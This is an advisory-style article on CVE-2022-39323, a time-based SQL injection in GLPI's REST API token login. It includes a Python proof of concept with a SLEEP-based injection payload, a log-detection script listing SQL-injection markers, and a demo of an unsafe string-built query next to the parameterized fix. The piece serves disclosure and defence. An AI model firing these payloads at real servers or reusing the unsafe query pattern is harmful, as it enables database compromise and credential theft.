GLPI, short for Gestionnaire Libre de Parc Informatique, is a popular open-source IT Asset Management and Helpdesk software. It's used by countless organizations for tracking inventory, managing tickets, controlling licenses, and supporting ITIL help desk workflows.

In late 2022, a critical security issue was identified and assigned CVE-2022-39323. This vulnerability allows attackers to conduct a time-based SQL injection via the REST API's user_token authentication mechanism.

This article provides an in-depth, easy-to-follow breakdown of the flaw, gives a real exploit example, and guides on how to mitigate it.

What is CVE-2022-39323?

- CVE ID: CVE-2022-39323
- Vulnerable Component: REST API authentication (user_token)
- Type of Flaw: SQL Injection (Time-based/Binary)

Official References

- GLPI Security Advisory: https://github.com/glpi-project/glpi/security/advisories/GHSA-5mc5-55jr-mvr3
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-39323

How Does the Vulnerability Work?

The GLPI REST API lets users authenticate with a personal user_token sent to the initSession endpoint. In vulnerable versions, the token value is placed directly into a SQL query without sufficient validation or escaping, so an attacker can inject SQL through the token value.

The most dangerous part: no prior authentication is needed. An attacker only has to send a crafted user_token and observe differences in the API's responses. With time-based SQL injection, the signal is how long the server takes to respond: a delayed response means the injected condition evaluated as true.

Proof-of-Concept (PoC) Exploit

Below is a Python example showing how the vulnerability could be verified against a GLPI instance running a vulnerable version (before 10.0.4). [Use only in controlled, authorized environments.]

import requests
import time

# Placeholder host: the initSession endpoint of the GLPI instance under test
TARGET_URL = 'https://victim-glpi-instance.com/apirest.php/initSession'

# Craft payload: 5 seconds delay if the condition is true (MySQL syntax).
# MySQL's IF() requires a third argument; 0 is the no-delay branch.
payload = "' OR IF(1=1, SLEEP(5), 0) -- "

headers = {
    'Content-Type': 'application/json',
    'App-Token': 'YOUR-APP-TOKEN'  # placeholder: the instance's API application token
}
body = {'user_token': payload}

# Measure response time; the timeout keeps the script from hanging if the server never answers
start = time.time()
response = requests.post(TARGET_URL, json=body, headers=headers, timeout=30)
elapsed = time.time() - start

# A response that took at least as long as the injected SLEEP() suggests the condition ran
if elapsed > 5:
    print("Vulnerable to CVE-2022-39323 (Time-based SQL Injection)!")
else:
    print("Probably Patched or Not Vulnerable.")

- The script sends a login request with a manipulated user_token.
- The injected SQL includes SLEEP(5), causing the database to pause for 5 seconds if the injection is successful.

With this type of SQL injection, attackers can:

- Enumerate users
- Extract password hashes
- Leak table contents
- Fully compromise the database
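Because a blind, time-based injection needs many login attempts and each true branch stalls the request for seconds, the attack leaves a recognisable trail on the initSession endpoint. The following added example (not part of the original article or of GLPI) runs three detection rules over a constructed log: it assumes a reverse proxy or API gateway in front of GLPI that records the user_token field of initSession requests in JSON lines, and it assumes legitimate tokens consist only of lowercase letters and digits. Both the log format and the token alphabet are assumptions for this example.

```python
import json
import string
from collections import Counter

# Constructed sample log (not GLPI's own log format). It models a reverse proxy or API gateway
# in front of GLPI that records the user_token field of initSession requests; the addresses,
# durations and tokens are made up for this example. Durations are in milliseconds.
SAMPLE_LOG = """
{"ts": "2022-11-03T15:01:02Z", "src": "203.0.113.7", "method": "POST", "path": "/apirest.php/initSession", "status": 401, "duration_ms": 5210, "user_token": "' OR IF(1=1, SLEEP(5), 0) -- "}
{"ts": "2022-11-03T15:01:03Z", "src": "198.51.100.20", "method": "POST", "path": "/apirest.php/initSession", "status": 200, "duration_ms": 88, "user_token": "b7e2c0ffee11deadbeef0123456789abcdef0123"}
{"ts": "2022-11-03T15:01:04Z", "src": "203.0.113.7", "method": "POST", "path": "/apirest.php/initSession", "status": 401, "duration_ms": 97, "user_token": "' OR 1=1 -- "}
{"ts": "2022-11-03T15:01:05Z", "src": "198.51.100.20", "method": "GET", "path": "/apirest.php/getMyProfiles", "status": 200, "duration_ms": 40, "user_token": ""}
{"ts": "2022-11-03T15:01:06Z", "src": "203.0.113.7", "method": "POST", "path": "/apirest.php/initSession", "status": 401, "duration_ms": 95, "user_token": "zzzz"}
"""

INIT_SESSION = "/apirest.php/initSession"
SQLI_MARKERS = ("'", "--", "SLEEP(")  # shapes taken from the payload discussed in the article
TOKEN_ALLOWED = set(string.ascii_lowercase + string.digits)  # assumed user_token alphabet
SLOW_MS = 3000        # a SLEEP(5) branch pushes an auth call far above its normal latency
BURST_THRESHOLD = 3   # failed initSession calls from one source before raising an alert


def classify_token(user_token):
    """Return why a token looks injected, or None if it looks like a plain token."""
    upper = user_token.upper()
    for marker in SQLI_MARKERS:
        if marker in upper:
            return "sql marker " + marker
    if user_token and not set(user_token) <= TOKEN_ALLOWED:
        return "characters outside the expected token alphabet"
    return None


def analyze(log_text):
    """Run the three rules over JSON-lines log text and return the alerts in log order."""
    alerts = []
    failures = Counter()  # failed initSession attempts per source address
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev["method"] != "POST" or ev["path"] != INIT_SESSION:
            continue  # only the token login endpoint is relevant to this CVE
        reason = classify_token(ev.get("user_token", ""))
        if reason:
            alerts.append({"rule": "sqli_token", "src": ev["src"], "ts": ev["ts"], "detail": reason})
        if ev["duration_ms"] >= SLOW_MS:
            alerts.append({"rule": "slow_auth", "src": ev["src"], "ts": ev["ts"],
                           "detail": f"initSession took {ev['duration_ms']} ms"})
        if ev["status"] != 200:
            failures[ev["src"]] += 1
            if failures[ev["src"]] == BURST_THRESHOLD:
                alerts.append({"rule": "auth_burst", "src": ev["src"], "ts": ev["ts"],
                               "detail": f"{BURST_THRESHOLD} failed token logins from one source"})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert["ts"], alert["src"], alert["rule"], "-", alert["detail"])
```

In production the slow_auth threshold should come from the endpoint's own baseline latency rather than a fixed constant, and the burst rule is only a coarse signal on its own; the token-content rule is the one that maps directly to this CVE, because a legitimate token never contains quotes, comment sequences or SQL function calls.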

How Was the Issue Fixed?

The flaw was patched in GLPI 10.0.4. The fix adds correct value escaping and parameterized queries during API authentication, so the token value can no longer alter the query.

- GLPI 10.0.4 Release Notes
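To make the difference between the vulnerable lookup and the fixed one concrete, here is an added example (not GLPI's code and not from the original article) that puts the two query styles side by side on an in-memory SQLite database. The users table, the sample rows and the token format (40 lowercase hex characters) are assumptions for this example; the injected value has the same shape as the article's payload (a quote to close the literal, OR with a true condition, and a comment to swallow the rest).

```python
import sqlite3

# Constructed sample data standing in for GLPI's user table. The schema and the token format
# (40 lowercase hex characters) are assumptions for this example, not GLPI's real definitions.
SAMPLE_USERS = [
    (1, "glpi", "b7e2c0ffee11deadbeef0123456789abcdef0123"),
    (2, "tech", "0123456789abcdef0123456789abcdef01234567"),
]
TOKEN_LENGTH = 40
TOKEN_ALPHABET = set("0123456789abcdef")


def make_db():
    """Build an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE glpi_users (id INTEGER PRIMARY KEY, name TEXT, api_token TEXT)"
    )
    conn.executemany("INSERT INTO glpi_users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_user_vulnerable(conn, user_token):
    """Pre-fix pattern: the token is spliced into the SQL text, so its characters
    become part of the query and can change its logic."""
    sql = f"SELECT id, name FROM glpi_users WHERE api_token = '{user_token}'"
    return conn.execute(sql).fetchall()


def lookup_user_fixed(conn, user_token):
    """Post-fix pattern: the token is bound as a query parameter, so the database
    only ever compares it as data; quotes and comments inside it have no effect."""
    sql = "SELECT id, name FROM glpi_users WHERE api_token = ?"
    return conn.execute(sql, (user_token,)).fetchall()


def is_well_formed_token(user_token):
    """Defence in depth: reject values that cannot be a real token before any SQL runs."""
    return len(user_token) == TOKEN_LENGTH and set(user_token) <= TOKEN_ALPHABET


def authenticate(conn, user_token):
    """Hardened login path: check the token's shape, then run the parameterized query.
    Returns the matching (id, name) row, or None."""
    if not is_well_formed_token(user_token):
        return None
    rows = lookup_user_fixed(conn, user_token)
    return rows[0] if rows else None


if __name__ == "__main__":
    db = make_db()
    injected = "' OR 1=1 -- "
    print("vulnerable lookup:", lookup_user_vulnerable(db, injected))  # every user
    print("parameterized lookup:", lookup_user_fixed(db, injected))   # nothing
    print("hardened login:", authenticate(db, injected))              # None
```

The shape check in authenticate is not a substitute for parameter binding; it is a second layer that also gives you a clean place to log and alert on malformed tokens before they reach the database.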

If you cannot upgrade immediately, disable login with user_token in the REST API. This removes the vulnerable attack vector.

Check your config/config_db.php or the API settings in GLPI to revoke or disable user token authentication for the REST API.

Conclusion

CVE-2022-39323 shows how dangerous SQL injection remains—even in mature open-source tools. Always ensure you keep your software up to date. Review API authentication flows, and avoid using user-supplied data directly inside SQL queries.

Are you running GLPI? Double-check your version and update if needed, or disable user_token authentication right away!


References
- GLPI Security Advisory GHSA-5mc5-55jr-mvr3
- CVE-2022-39323 on NIST NVD
- GLPI Releases

Timeline

Published on: 11/03/2022 15:15:00 UTC
Last modified on: 11/03/2022 18:28:00 UTC